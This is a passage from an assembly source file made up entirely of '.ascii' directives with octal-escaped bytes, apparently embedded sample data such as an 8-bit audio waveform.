"\351\370\355\353\364\345\361\364\340\357\375\365\360" .ascii "\357\362\002\015\024\030\026\031';KEE@NOPU@+%\027\020" .ascii "!\024\010\367\373\024 \033)(8:.E.( \031\021\010\000" .ascii "\372\367\350\341\340\357\361\350\331\317\321\324\314" .ascii "\317\313\305\314\310\333\350\333\342\326\335\351\354" .ascii "\340\347\354\352\370\363\003\003\012\011\034\036%%'" .ascii "0(#)6AG,7120#\037\375\356\360\354\371\353\327\323\335" .ascii "\351\343\345\337\342\346\352\353\363\355\354\342\347" .ascii "\347\335\334\330\340\320\324\313\332\342\332\326\326" .ascii "\336\345\345\323\343\327\325\331\355\354\325\321\331" .ascii "\342\337\331\313\324\317\326\327\331\344\343\347\353" .ascii "\376\004\012\021\017 \034\026\027$0&\036,(\037)\027" .ascii "\031\012\007\000\000\020\372\361\364\005\012\004\005" .ascii "\012\013\021\025\025\033\027\023\016\024\027\010\007" .ascii "\003\000\007\001\375\013\000\012\023\012\017\014\022" .ascii "\025\007\374\022\007\005\011\377\372\365\377\014\017" .ascii "\372\007\002\005\014\013\024\016\020\021#(+29I@AEEJ" .ascii "@71>0(!\007\010\370\367\361\353\345\315\306\305\313" .ascii "\317\275\302\316\332\347\354\365\364\364\364\001\001" .ascii "\377\371\370\005\012\010\011\010\034 \026\030!\036\017" .ascii "\013\005\375\362\363\365\363\361\333\317\337\342\342" .ascii "\323\326\322\337\347\342\352\342\344\341\361\360\364" .ascii "\356\363\003\007\016\014\024\031$\032\026(#\023\015" .ascii "\005\373\372\350\357\341\335\334\321\346\334\353\336" .ascii "\336\357\370\371\365\372\370\370\356\365\357\346\335" .ascii "\327\337\340\334\336\341\353\362\353\363\364\363\356" .ascii "\344\351\336\331\334\330\315\313\312\311\321\332\334" .ascii "\333\337\337\365\364\355\373\375\375\370\006\014\015" .ascii "\012\023\"+-27=C@A@=52*&\032\023\025\022\017\023\022" .ascii "\026\035\031\"!\035!$01%(\036,2&\032\034\")&\035\" " .ascii "-&*+&!\035\027\020\007\370\373\367\362\342\332\345\345" .ascii "\345\337\323\324\326\320\320\320\312\303\275\303\305" .ascii "\306\300\313\337\356\361\362\377\005\020\024\035\024" .ascii "\030\025\020\023\020\020\004\022\027\032\026\020" .ascii "\025\035\036\027\033\025\035\036\027\027\031\031\026" .ascii "\030\031\021\004\374\015\015\012\015\012\030\021\014" .ascii "\015\004\001\375\372\364\361\366\336\344\354\356\347" .ascii "\336\342\342\341\325\336\331\335\334\331\333\332\324" .ascii "\324\333\336\336\333\336\345\365\366\363\362\362\370" .ascii "\355\363\354\346\332\317\327\306\310\267\305\313\312" .ascii "\304\303\317\321\342\327\333\334\350\352\346\354\366" .ascii "\357\355\377\004\010\005\010\022\037\037!\037'/,-,-" .ascii "&&$&(\030\032!!\035\033\032 \035\032\033\031'\034\036" .ascii "\036'\036\025'%&%\037$5*/*)2')\"\032\020\014\010\010" .ascii "\000\365\372\373\000\375\371\374\003\006\002\004\000" .ascii "\005\002\377\000\376\365\371\370\363\370\352\356\357" .ascii "\356\355\350\335\334\333\325\325\322\332\321\321\322" .ascii "\336\337\324\340\347\356\363\362\372\006\006\013\017" .ascii "\020\030\033 )+$&'-0&%'1/-&&%\036\037\026\024\004\002" .ascii "\000\376\365\350\352\353\361\347\343\334\351\347\346" .ascii "\357\360\366\371\373\373\376\365\372\362\373\374\366" .ascii "\364\360\374\372\366\362\366\364\360\362\355\350\341" .ascii "\340\336\342\335\321\323\324\327\323\315\311\320\321" .ascii "\316\320\322\326\324\330\326\337\336\337\334\341\351" .ascii "\346\342\340\366\354\364\361\363\374\366\002\003\370" .ascii "\363\372\365\003\372\360\364\370\001\003\000\004\017" .ascii "\020\025\030\035!#&)1(++470-0846-1$\034=3\372'\014\013" .ascii "\037\031<\031\347\012>\"\032\264\336\334\365\022\372" .ascii "\031\331\370\006/\023%i9'\"7\027\352\":\371\307\324" .ascii "\324\372!\027\376\004\037\014\356\331\347\337\327\315" .ascii "\271\256\310\306\272\273\311\334\326\331\321\351\351" .ascii "\001\002\371\371\375\024\030\367\375\025\365\375\364" .ascii "\363\002\362\356\354\355\010\020\020\375\371\014\030" .ascii "\000\001\023\020\020\016\377\370\021\005\006\005\031" .ascii "+0:<9==2('1\026\020\373\363\022\375\347\365\363\013" .ascii "\017\357\352\361\373\360\351\337\341\343\327\304\301" .ascii "\307\317\321\311\323\324\334\352\341\327\337\335\324" .ascii "\315\307\312\323\303\272\260\254\310\265\270\304\277" .ascii "\347\342\307\337\347\357\362\344\346\364\376\360\351" .ascii "\365\015\027\034''6KGGTWSSRMRRI6-787'&2C7 2/54\021\016" .ascii "\035\020\014\002\374\010\021\016\007\023\025\031\027" .ascii "\017\030 \035\025\007\001\013\376\361\332\332\342\337" .ascii "\330\314\331\340\354\337\316\334\344\350\344\304\305" .ascii "\324\311\305\270\272\310\305\277\312\330\340\350\350" .ascii "\362\002\017\022\014\014\017\034\022\022\010\007\037" .ascii "#\036\032-AI>[email protected]% \030\033/(\031$)42!(-1&\025\014" .ascii "\007\005\371\346\333\334\351\336\321\321\323\346\345" .ascii "\332\320\326\345\337\315\277\305\307\300\265\260\276" .ascii "\307\277\275\312\324\344\343\326\350\362\366\362\342" .ascii "\337\350\346\326\312\310\311\322\322\307\306\317\345" .ascii "\350\335\340\356\367\364\353\341\351\356\351\337\345" .ascii "\372\004\003\377\023%54,AOPI;<F?5($+3- '0<:557:1!\026" .ascii " \027\012\375\003\020\021\011\000\020\035\"\027\017" .ascii "\034&\037\022\000\000\010\373\355\337\335\344\347\335" .ascii "\330\340\350\362\362\356\356\367\366\354\342\340\350" .ascii "\342\330\317\330\347\351\337\336\357\376\000\366\363" .ascii "\001\015\003\363\344\347\355\341\324\313\320\332\335" .ascii "\330\340\352\370\006\005\014\025!!\035\031\037+'\037" .ascii "\035)9:03ESSGEQ[N;/34$\023\007\012\012\005\372\374\001" .ascii "\004\006\374\376\000\001\370\355\344\346\350\335\320" .ascii "\316\327\341\337\323\330\350\371\366\351\352\370\000" .ascii "\361\342\330\337\336\320\301\274\304\305\300\272\303" .ascii "\315\322\322\316\326\335\333\324\311\306\314\312\302" .ascii "\270\272\305\321\317\306\323\346\366\363\352\360\002" .ascii "\012\001\366\362\002\002\366\357\363\377\002\000\376" .ascii "\016\035$\"#/970)+5/'\036$/82,8FRKBFTTG83:2 \023\025" .ascii "\031\026\010\007\025\035\034\023\023\034$\031\016\005" .ascii "\006\014\002\366\355\364\376\003\372\367\002\016\030" .ascii "\020\011\015\027\023\005\367\363\367\352\327\314\316" .ascii "\322\312\273\273\307\315\307\273\274\310\317\302\270" .ascii "\264\274\304\274\266\265\303\321\330\330\340\360\002" .ascii "\017\016\023\037*+#\033 $\031\012\005\014\021\014\376" .ascii "\006\026\037\031\017\025#)\031\017\012\022\024\006\373" .ascii "\372\003\011\012\005\014\027!$\"$,0*!\031\036\033\016" .ascii "\377\374\004\007\377\361\374\012\022\012\377\007\025" .ascii "\030\007\373\371\002\000\360\347\350\357\362\356\352" .ascii "\364\373\000\377\374\377\005\002\367\356\346\352\341" .ascii "\321\303\302\310\311\277\265\302\321\331\323\315\330" .ascii "\351\354\337\330\332\346\345\332\325\335\347\354\351" .ascii "\355\375\006\013\013\021\030 \033\023\020\016\022\010" .ascii "\375\361\365\373\373\361\353\370\004\012\003\377\007" .ascii "\024\022\007\000\002\012\004\372\367\001\007\011\006" .ascii "\015\035$'&.7=5//.0%\032\024\027\032\030\021\015\026" .ascii "\037\"\034\030\035%\037\024\014\012\013\001\366\361" .ascii "\365\364\362\353\360\376\001\000\376\010\021\027\016" .ascii "\012\015\017\022\012\002\003\007\013\014\007\012\024" .ascii "\033\037\034\034\036%\036\027\021\016\016\004\372\370" .ascii "\375\373\370\362\370\005\004\001\374\003\011\011\373" .ascii "\363\362\361\355\337\326\324\323\320\320\313\315\322" .ascii "\326\331\331\331\333\340\333\331\326\326\326\320\314" .ascii "\315\325\325\325\324\335\353\356\354\354\365\376\377" .ascii "\365\361\362\363\357\345\336\335\335\331\331\325\331" .ascii "\334\334\340\342\344\344\347\342\344\342\342\343\336" .ascii "\337\343\354\357\363\365\002\022\030\032\035&26.-/3" .ascii "0($&'#%$*,+.2421,-,($\036\035\036! \037\035#,/+*-34" .ascii ")'%% \030\022\022\022\012\013\012\017\017\013\015\021" .ascii "\024\020\015\007\011\006\002\375\367\365\365\366\364" .ascii "\363\360\365\371\372\365\362\362\363\361\345\340\332" .ascii "\330\322\311\305\305\304\276\301\303\314\317\315\323" .ascii "\334\344\345\345\345\356\362\361\362\362\363\371\374" .ascii "\376\001\001\007\014\020\017\016\017\021\023\014\011" .ascii "\005\003\376\367\364\362\360\350\350\351\355\355\350" .ascii "\351\356\362\360\354\350\355\356\353\350\347\350\354" .ascii "\357\360\365\365\374\000\006\010\011\012\014\020\013" .ascii "\014\010\007\005\001\000\000\377\371\373\375\003\003" .ascii "\376\377\005\007\005\000\374\000\377\372\366\365\364" .ascii "\365\365\364\370\366\372\375\001\004\005\006\007\015" .ascii "\013\016\013\013\014\014\014\016\020\014\017\023\032" .ascii "\035\032\033\"'%\"\037#$!\035\035\034\035\035\034! " .ascii " !$'%\" \"\036\034\027\022\017\012\007\004\002\373\372" .ascii "\373\376\377\372\371\376\001\377\374\370\373\374\372" .ascii "\367\367\367\370\370\367\375\373\374\375\000\003\003" .ascii "\377\374\000\374\372\364\356\353\346\341\335\332\321" .ascii "\317\315\316\315\307\304\307\311\310\306\303\307\312" .ascii "\312\313\317\323\327\334\340\353\360\364\371\002\012" .ascii "\016\017\017\027\030\031\026\023\023\020\016\015\013" .ascii "\006\005\006\007\010\005\002\004\007\005\003\376\001" .ascii "\000\376\374\373\373\372\373\372\000\001\000\000\004" .ascii "\012\013\012\006\013\014\014\011\005\005\004\002\001" .ascii "\001\375\375\376\001\004\002\000\003\007\007\007\003" .ascii "\005\006\005\004\004\005\003\005\004\011\012\006\005" .ascii "\007\013\012\007\001\005\004\001\375\370\366\364\362" .ascii "\357\360\355\355\356\362\366\370\370\375\003\006\011" .ascii "\011\014\020\022\024\026\032\031\034\035#&$%(--+&))" .ascii "'#\036\034\031\025\021\020\014\010\007\007\011\007\003" .ascii "\002\005\003\004\000\377\377\376\376\376\377\374\377" .ascii "\376\002\005\002\002\004\011\011\010\003\006\010\005" .ascii "\002\376\374\372\367\363\363\360\354\352\352\354\352" .ascii "\346\343\346\344\342\335\332\331\326\323\321\320\314" .ascii "\314\313\316\321\316\317\323\332\335\337\336\344\352" .ascii "\353\356\356\362\364\366\370\374\375\375\377\002\007" .ascii "\010\006\006\013\013\014\012\007\011\010\007\007\010" .ascii "\005\005\005\007\012\005\004\004\010\010\006\002\003" .ascii "\004\001\377\374\372\370\366\363\365\363\360\360\361" .ascii "\365\366\364\363\367\371\372\371\370\372\371\371\371" .ascii "\375\376\000\004\007\016\013\015\016\024\025\022\003" .ascii "\365\010\020\377\376\366\357\362\376\363\021\000\031" .ascii ";\314\370\005\36252\0134\0369\"\347\375" .ascii "\336\006\304\307\370)\036\270\3728\371\374\322\360\037" .ascii "\325\344\312\275\311\277\312\363\362\356\317\001\036" .ascii "\375\005\0122H4\003\017-\034\370\366\031\020\357\022" .ascii "\016\030\031\341\316\374\317\263\243\301\335\275\305" .ascii "\240\366\325\264\303\313\332\350\330\323\000\004\024" .ascii "\034NdeSMVP6.&6!\360\344\352\331\304\275\315\344\353" .ascii "\343\350\004\305\330\315\256\324\352\007\356\362!\004" .ascii "\004\020\027\034 \033\0247\027\011\025\024\0343%>(\005" .ascii "-,\023\012\022\371\372\030\016\013\020\026\017\377\006" .ascii "\033\024\003-\354\330\351\354\344\310\010\372\362\376" .ascii ",4;?.4&@\004\0350\015\013\006*\015\030\030\037&\027" .ascii "\025\373\002\363\333\270\251\310\351\302\330\376\324" .ascii "\333\342\361\341\342\352\317\352\372\364\355\367\035" .ascii "\036%.K]L8.*\036\033\030\014\017\023\371\007\007\011" .ascii "\016\001\010\011\014\370\343\335\371\364\325\367\005" .ascii "\376\360\357\012\347\320\267\277\324\276\274\271\311" .ascii "\314\312\271\322\362\367\351\345\374\366\007\373\375" .ascii "\022\035+\035/+&\033$+\023#\012\375\363\357\304\277" .ascii "\300\300\312\240\337\314\314\360\364\354\330\361\336" .ascii "\331\005\017\357\355\012\007\367\367\372\373\377\034" .ascii "\023\031\010\027\015\021&\0132)<P&\030/\037#\031\007" .ascii "\020\026\021\375\004\025\376\353\017\376\013\006\376" .ascii "\357\332\331\313\326\343\375\355\346\000\017\010\015" .ascii "\006\026\021$+%0?B)B:A7B;8D5*%@\031\024!\032\013\363" .ascii "\372\370\355\331\352\334\326\355\353\331\330\362\341" .ascii "\314\362\012\343\336\342\326\327\340\335\336\341\371" .ascii "\347\337\362\376\373\376\010\015\037\013\034\"BJ17B" .ascii "M=?D?5&\"\026\017\010\360\353\365\356\312\272\323\320" .ascii "\276\306\330\327\313\271\257\300\271\301\253\310\332" .ascii "\347\337\353\002\367\372\361\377\355\000\361\004\354" .ascii "\372\367\351\373\012\031\367\032\0331\017\022\370\345" .ascii "\023\372\375\010\015\004\351\356\353\343\326\337\333" .ascii "\323\342\277\303\311\340\300\327\346\334\002\361\361" .ascii "\354\355\337\350\332\340\363\341\350\367\021\012\017" .ascii "!*/*-%+\"\026\015\012\017\024\002\024(\023\030%&\036" .ascii "\033\016\026 $\022\020\025\"\031\016-4+\026\031\017" .ascii "\020\376\353\320\352\362\317\344\342\373\346\342\354" .ascii "\356\006\004\011\000\023\021\006\016,E4V_]SG7)31\027" .ascii "\001)\014\374\012\003\013\370\372\005\005\374\350\323" .ascii "\305\311\301\277\306\343\344\347\366\370\374\360\364" .ascii "\330\351\357\323\334\323\357\365\346\002\004\032\"*" .ascii ".+&\025\021\011\024\014\011\024$\015\014\032\022\033" .ascii "\015\026\017\017\020\370\357\361\367\344\351\352\003" .ascii "\373\352\002\373\363\353\354\344\363\370\360\357\373" .ascii "\373\353\350\356\355\337\332\335\335\322\270\266\265" .ascii "\254\271\260\273\333\335\313\346\334\322\335\330\330" .ascii "\325\350\351\353\356\002\023\014$7=::1\"'\016\377\372" .ascii "\364\350\364\364\367\373\347\376\377\003\376\377\000" .ascii "\003\020\012\002\001\027\030\025\037&\033\024\017\373" .ascii "\370\373\004\350\353\012\361\377\363\364\013\357\367" .ascii "\375\010\021\014\005\375\002\376\005\015#%)20-\037\035" .ascii "\016\036\033\022\020\037%\034 \031:5:QUOA@5+0-\034'" .ascii "(\022\021\011\005\371\361\353\334\334\330\324\270\276" .ascii "\260\246\250\256\305\303\305\310\320\334\346\323\341" .ascii "\377\374\002\030\030#!\033$$\037$\037\033\037\023\010" .ascii "\375\016\011\011\011\021\034\013\016\016\013\006\006" .ascii "\014\006\027\013\004\027 \031\020\022\026#\012\013\375" .ascii "\357\350\341\323\320\332\326\327\326\335\327\331\322" .ascii "\330\320\316\322\312\304\326\343\317\330\346\352\346" .ascii "\346\353\342\331\325\324\330\330\330\317\323\350\333" .ascii "\337\347\353\353\351\361\356\371\374\377\372\006\016" .ascii "\016\022\034\035\030 \034\005\373\362\354\353\356\364" .ascii "\363\370\006\016\024\027\037\037(+%(&\031\016\031\033" .ascii "\025\022\037$\035\031\024\015\006\010\362\362\364\347" .ascii "\344\345\365\355\351\367\004\376\001\377\004\004\375" .ascii "\015\374\004\023\036\" 1/.3+'\"\037\023\021\031\034" .ascii "\021\024')&,2*+ \022\026\024\005\001\010\032\"\023\030" .ascii "\034\022\027\004\377\362\345\343\317\316\316\316\306" .ascii "\321\341\343\343\355\367\365\364\362\362\363\377\376" .ascii "\371\002\016\025\033!# \024\025\013\373\373\371\350" .ascii "\337\352\334\342\350\364\363\343\371\367\362\354\355" .ascii "\360\352\356\350\347\365\371\366\366\007\016\014\017" .ascii "\010\007\371\376\356\341\363\354\353\346\364\004\365" .ascii "\363\014\005\003\005\373\003\366\374\367\354\377\000" .ascii "\373\000\001\002\003\367\364\344\333\326\306\306\306" .ascii "\313\277\311\323\332\340\340\350\340\351\347\333\326" .ascii "\333\326\317\336\355\355\350\361\005\002\004\017\010" .ascii "\376\370\367\347\354\374\374\372\005\011\014\024\030" .ascii "\035\035\037\033\030\030!\035\033\"35.>@=7>=.*\"\023" .ascii "\035 \023\024\"(%\036!#\033\032\022\021\024\031\027" .ascii "\022\037$ %//,'\"\031\022\016\373\361\363\370\355\345" .ascii "\365\367\366\363\366\362\345\340\330\331\320\323\312" .ascii "\273\311\323\321\322\340\354\346\340\341\333\351\360" .ascii "\341\343\346\364\354\370\014\022\026\034+(.-+*./%%." .ascii ".&(')\036\016\017\377\002\374\347\361\366\370\351\362" .ascii "\375\370\371\376\374\361\361\357\354\353\356\350\352" .ascii "\367\012\004\377\006\002\004\373\365\354\345\340\327" .ascii "\316\317\325\316\312\326\333\336\332\334\335\337\337" .ascii "\327\326\314\341\323\322\333\341\336\334\342\346\352" .ascii "\341\347\340\345\334\336\325\332\347\334\333\337\357" .ascii "\351\345\356\346\355\362\360\357\372\004\004\020\033" .ascii "'#)--+$$\031\030\032\022\023\033\035\032\037-61/1)*" .ascii "&\"\"!/\035!0-1-42+*\024\011\021\006\000\374\004\005" .ascii "\376\006\016\020\015\020\014\016\020\020\015\015\031" .ascii "\025\021\027\035\035\023\021\015\012\375\371\353\344" .ascii "\353\333\330\323\337\330\321\326\330\332\316\306\304" .ascii "\315\300\304\306\312\342\344\347\362\010\017\022\025" .ascii "\026\032\026\025\017\024\025\016\015\027%\037\036$*" .ascii "'!!\031\031\026\017\013\020\021\012\013\022\033\026" .ascii "\020\021\020\013\006\373\367\374\367\350\346\362\356" .ascii "\355\361\362\370\363\360\365\356\360\361\357\345\356" .ascii "\362\362\367\376\001\371\375\367\365\351\347\334\325" .ascii "\331\323\320\317\336\337\333\337\346\350\337\340\333" .ascii "\327\330\326\316\320\337\331\334\342\362\364\351\355" .ascii "\356\347\347\336\322\323\323\324\311\317\341\343\353" .ascii "\355\362\375\373\002\002\006\010\006\014\023\034\032" .ascii "\037&2.+3-)\"!\024\032\032\034\033&.,,25.+ \020\006" .ascii "\035\013\364\025\024\0236 5\342\017?4\035\340\013\265" .ascii "\314\360\345\311\002\375\036\374\354\014\324\373\306" .ascii "\025\003\274\306\307\300\027\003\307\002\371\032I?\034" .ascii "/\015\362\337\344\323\315\336\331\330\263\302\274\270" .ascii "\331\361\322\273\345\347\327\341\363\365\354\322\315" .ascii "\275\262\276\260\256\265\300\323\331\343\015\02276\022" .ascii ".0*\026\005\371\350\342\330\306\341\015053QMB>>A@B\037" .ascii "\026 \030&\014\006'\"&*'=9.*\033,&\025&\016\373\017" .ascii "\014\375\374\004\002\006\007\374\002\007\000\366\337" .ascii "\344\370\346\327\332\335\330\354\357\363\017\011\003" .ascii "\374\375\022\024\000\361\351\377\371\337\343\325\333" .ascii "\352\331\334\340\321\313\333\356\371\033!!\037 $ \033" .ascii "\014\014\014\034#\031\">N`g^fUG8*02\032\001\003\003" .ascii "\006\362\362\366\367\004\360\352\370\373\372\361\356" .ascii "\366\375\371\351\337\320\326\317\277\267\270\300\304" .ascii "\277\275\311\324\340\317\313\316\333\350\317\302\275" .ascii "\270\277\275\275\317\347\364\343\331\351\360\353\351" .ascii "\340\354\360\361\346\355\001\023\035\020\031!-*\037" .ascii "\021\023\032\013\004\005\023 )\"%&\")\033\036197--0" .ascii "4:2%*/ \022\007\020\030\016\000\373\014\026\032\021" .ascii "\014\035&#\035\030\031\031\010\364\351\354\353\337\324" .ascii "\322\344\346\347\360\355\375\011\020\022\027\035\022" .ascii "\000\364\352\351\356\343\332\325\341\361\357\351\354" .ascii "\375\004\003\363\335\331\323\312\301\316\345\360\355" .ascii "\352\361\001\015\011\011\023-805@N" .ascii "XVOIJB+\034\035 !\036\033\035\"-&\033\024\032\023\377" .ascii "\365\353\355\355\347\340\351\371\005\373\363\003\017" .ascii "\013\371\356\346\351\345\311\274\302\312\304\270\272" .ascii "\306\323\330\323\311\322\332\331\323\322\340\340\332" .ascii "\315\302\272\273\274\260\255\270\307\316\322\340\365" .ascii "\010\024\016\001\003\014\377\347\330\327\324\322\306" .ascii "\306\333\363\004\000\014!//-19<0\"\022\032\037\022\011" .ascii "\017 &+-1@LK<9?@6-'(22+%5;60-774%\034#&\033\006\004" .ascii "\016\026\020\016\024\034$\032\014\013\033\034\013\377" .ascii "\375\001\372\356\337\327\333\332\310\263\255\251\243" .ascii "\246\256\273\315\335\336\334\334\346\347\330\323\321" .ascii "\331\340\342\336\351\007 &\"/75&\024\013\013\012\363" .ascii "\342\344\360\354\336\336\347\365\370\366\362\375\016" .ascii "\014\004\003\020\023\017\005\001\003\005\006\371\361" .ascii "\370\002\004\000\001\007\023\032\027\015\020\034\026" .ascii "\004\365\365\366\366\357\352\365\004\014\377\372\006" .ascii "\022\012\375\372\376\005\376\357\352\365\376\365\347" .ascii "\346\362\364\360\351\345\352\356\354\336\335\347\355" .ascii "\350\341\342\342\354\355\351\350\366\002\377\370\367" .ascii "\001\004\003\371\362\370\000\372\347\344\354\361\351" .ascii "\335\337\353\371\375\371\375\024%\037\031\034%#\031" .ascii "\011\002\007\007\375\360\370\007\015\014\020\034+;=" .ascii "<>EA. \030\027\023\016\006\005\025!#\034$01$\017\376" .ascii "\365\365\345\330\334\357\371\361\362\376\020\027\026" .ascii "\023\035180,<JLB;:7/\033\015\013\021\013\002\001\003" .ascii "\013\012\006\374\367\373\366\346\326\326\325\322\313" .ascii "\304\312\327\343\334\331\346\370\370\352\343\343\346" .ascii "\334\312\272\272\302\274\260\256\277\311\312\310\311" .ascii "\324\336\342\331\330\337\342\330\312\310\307\307\305" .ascii "\301\276\312\330\334\336\343\364\374\375\371\363\363" .ascii "\366\361\335\322\324\330\322\315\321\335\360\372\000" .ascii "\005\032-.,/:80$\034\036\037\031\013\020\036&#%/7><" .ascii "6388-%%('(((09;7;AC>93/1* \032%+'#&0-)\037\035%(\035" .ascii "\021\026\031\025\007\377\374\367\360\336\315\304\305" .ascii "\277\272\302\317\332\337\350\352\356\361\363\354\346" .ascii "\350\351\352\353\360\366\004\024\031\030\033%\"\026" .ascii "\013\003\376\366\351\330\323\325\322\307\302\314\322" .ascii "\323\322\327\333\342\344\335\334\341\344\335\330\333" .ascii "\335\335\334\334\331\334\341\341\336\337\345\347\351" .ascii "\351\351\347\351\353\342\335\334\340\336\335\337\343" .ascii "\354\362\364\363\375\006\010\002\005\013\012\010\002" .ascii "\001\000\005\000\367\367\376\001\372\374\376\002\005" .ascii "\007\006\006\016\021\021\017\026\031\031\036\"&)143" .ascii "589651..-%\036 \033\024\024\030\032\035\033\034$.*" .ascii "&)-+\"\035\030\026\021\013\004\003\012\010\006\013\026" .ascii "\033\035\"##\036\033\017\006\000\371\363\357\360\352" .ascii "\356\362\365\361\357\362\355\344\325\313\301\276\271" .ascii "\261\262\272\302\300\304\317\332\336\342\352\360\372" .ascii "\377\001\004\021\030\027\027\032\034\024\021\012\004" .ascii "\377\374\370\362\363\361\356\355\360\356\351\352\353" .ascii "\347\340\337\336\333\332\332\333\340\351\354\357\367" .ascii "\001\004\000\002\003\002\374\366\356\354\357\352\345" .ascii "\344\354\355\354\357\363\366\371\375\374\375\377\377" .ascii "\374\371\374\370\366\366\372\371\373\001\003\006\011" .ascii "\016\015\016\016\012\006\004\004\372\366\365\367\364" .ascii "\364\370\373\004\012\020\022\035()).40.*'$!\034\026" .ascii "\032\034\035\031\037$$$$$ \033\030\025\025\023\020" .ascii "\024\025\023\022\032\033\030\030\030\031\025\023\016" .ascii "\013\015\013\005\003\013\013\010\007\013\014\011\007" .ascii "\003\004\005\004\376\374\001\000\372\365\364\356\347" .ascii "\337\325\314\302\276\270\270\274\300\302\312\325\330" .ascii "\333\337\346\346\346\351\352\357\364\372\375\011\024" .ascii "\027\031\037%!\034\026\023\014\006\375\362\360\356\351" .ascii "\341\343\345\344\342\344\350\346\351\347\347\347\352" .ascii "\351\346\353\356\355\354\361\361\360\360\363\363\361" .ascii "\364\363\363\365\366\363\361\365\364\360\354\357\357" .ascii "\356\356\356\357\362\367\364\367\374\000\377\376\003" .ascii "\003\002\000\377\374\373\373\365\363\364\367\363\364" .ascii "\370\372\373\376\003\003\007\013\015\017\024\027\027" .ascii "\034!%#',---.,-+''(' !\" \032\032\032\031\034\033\033" .ascii "\036&'%(+,''%\"\035\032\026\022\023\017\015\020\025" .ascii "\025\025\032\035\034\030\031\024\020\013\006\001\000" .ascii "\000\372\372\375\001\374\371\373\370\362\350\341\330" .ascii "\323\316\307\304\306\313\310\314\323\332\333\337\346" .ascii "\351\360\363\367\373\005\013\014\021\026\031\024\024" .ascii "\023\017\010\005\001\374\372\365\361\357\362\357\351" .ascii "\351\353\351\342\341\336\333\332\327\326\326\333\333" .ascii "\333\340\350\351\347\353\354\354\351\347\343\340\340" .ascii "\334\331\331\334\332\331\336\342\342\342\350\351\352" .ascii "\353\353\352\354\356\352\350\352\355\351\351\354\355" .ascii "\354\353\354\353\354\354\350\350\351\353\345\345\347" .ascii "\352\350\353\357\361\370\374\003\006\021\027\033\037" .ascii "(+*,/,+()$(\036\037\037\0329\037*\007\365\035\012\006" .ascii "4*\020\"CB%\"\026)5DGB7E>\033C2\034+\366-\033\375,\374" .ascii "\015\030\363\375\026\013\017\011\022\005\010\025\372" .ascii "\022\016\024\000\002\023\365\351\362\360\362\000\375" .ascii "\366\360\001\343\356\370\377\375\352\366\373\375\013" .ascii "\000\011!\351\021 !.\"!%\"\021\013\014\012\376\010\371" .ascii "\007\006\007\006\002\015\373\365\371\376\365\337\354" .ascii "\360\342\350\346\343\335\344\343\342\343\316\302\320" .ascii "\312\314\336\326\332\334\325\333\351\335\344\355\344" .ascii "\357\364\376\363\365\354\334\347\351\364\372\364\347" .ascii "\346\341\342\333\317\317\313\312\302\311\271\266\274" .ascii "\270\307\317\337\337\343\343\335\354\361\363\373\007" .ascii "\017\032\024\034\036\026!\030$\036\035+%\037\012\007" .ascii "\374\375\001\003\377\375\007\373\366\370\371\364\374" .ascii "\001\014\016\007\015\011\030\021\014#\036\034,# \035" .ascii "\032\031\034\037%*+)\036\026\010\012\377\003\001\000" .ascii "\007\001\376\373\364\356\360\355\356\365\374\363\344" .ascii "\335\332\331\344\345\354\373\005\365\000\010\371\013" .ascii "\020\024\035(&('%$\"&/4-&\037\034\011\003\001\000\002" .ascii "\003\011\006\011\006\005\000\000\012\013\021\026\030" .ascii "\021\010\006\007\022\021\017!\032\022\025\007\377\372" .ascii "\362\362\362\370\362\352\347\333\332\335\340\344\360" .ascii "\373\366\373\374\370\365\365\370\372\010\014\015\023" .ascii "\017\005\002\374\377\004\004\003\371\370\366\343\340" .ascii "\341\326\340\337\343\351\350\345\343\341\345\357\366" .ascii "\377\013\026\021\022\020\031\034\034&,20-(#\035\034" .ascii "\032$%##\033\027\015\010\006\375\011\010\004\010\003" .ascii "\377\371\367\373\000\001\011\013\014\007\004\001\377" .ascii "\005\012\016\026\034\035\027\023\024\016\016\016\023" .ascii "\023\023\017\005\000\371\361\354\355\354\347\336\335" .ascii "\313\302\277\257\257\265\273\300\305\312\321\322\323" .ascii "\334\351\360\374\010\013\021\023\025\026\030 \"'/.'" .ascii "\033\023\010\375\373\365\362\362\356\347\337\336\333" .ascii "\324\330\333\335\350\347\346\347\343\342\341\345\361" .ascii "\370\373\377\001\002\372\372\371\366\372\370\372\365" .ascii "\361\354\342\336\336\337\337\343\347\343\341\334\326" .ascii "\322\323\324\327\335\344\344\344\350\343\344\345\346" .ascii "\354\360\363\363\355\353\351\346\343\351\357\363\365" .ascii "\372\372\370\366\365\365\367\377\002\006\010\012\007" .ascii "\001\006\011\014\022\030\031\033\034\026\022\023\026" .ascii "\026\035&),((#!#$&(-($\"\036\030\025\030\030\030\026" .ascii "\024\015\006\002\373\372\000\010\011\015\022\022\021" .ascii "\021\022\023\030\036!#&\"\033\030\026\025\023\023\025" .ascii "\021\011\377\363\347\341\334\326\330\334\335\333\334" .ascii "\336\336\341\347\362\373\006\016\022\025\033\035\036" .ascii "'08<@B=81*))%\" \034\024\010\004\000\375\375\376\377" .ascii "\374\371\362\352\346\347\345\347\360\370\373\372\374" .ascii "\373\372\373\376\001\005\013\010\005\004\002\375\372" .ascii "\001\005\010\012\012\010\003\374\365\360\357\362\356" .ascii "\356\357\353\344\335\334\331\332\335\337\341\342\341" .ascii "\331\325\330\333\335\345\360\370\375\377\003\003\005" .ascii "\011\014\023\032\037\036\036\035\031\025\023\027\031" .ascii "\031\030\025\015\007\000\367" .ascii "\367\372\375\377\004\011\007\006\004\006\010\016\024" .ascii "\030\034\037\036\030\030\030\031\031\036! \036\026\017" .ascii "\005\001\374\371\373\376\376\371\367\363\357\354\356" .ascii "\360\363\371\372\370\366\365\361\356\362\366\371\372" .ascii "\373\370\361\352\343\334\332\335\335\335\337\341\336" .ascii "\333\335\336\341\347\355\363\366\371\367\365\365\371" .ascii "\374\377\007\016\020\020\021\015\014\013\012\012\014" .ascii "\017\013\007\005\002\375\372\375\376\001\001\377\372" .ascii "\366\361\352\346\345\350\347\347\350\350\344\337\337" .ascii "\335\337\340\341\342\343\344\341\336\340\344\346\354" .ascii "\363\370\373\373\372\370\370\367\365\366\371\373\366" .ascii "\362\357\354\347\343\342\340\337\334\327\320\314\310" .ascii "\302\302\307\315\320\326\335\343\347\352\360\365\376" .ascii "\006\013\021\030\033\033\035 $%(**(\"\034\025\023\017" .ascii "\012\011\013\012\006\005\003\001\376\000\001\003\007" .ascii "\010\010\010\014\013\013\017\026\032\034\037 \036\034" .ascii "\032\026\025\027\026\025\025\027\024\017\016\015\014" .ascii "\012\012\007\005\002\375\367\364\363\361\357\357\361" .ascii 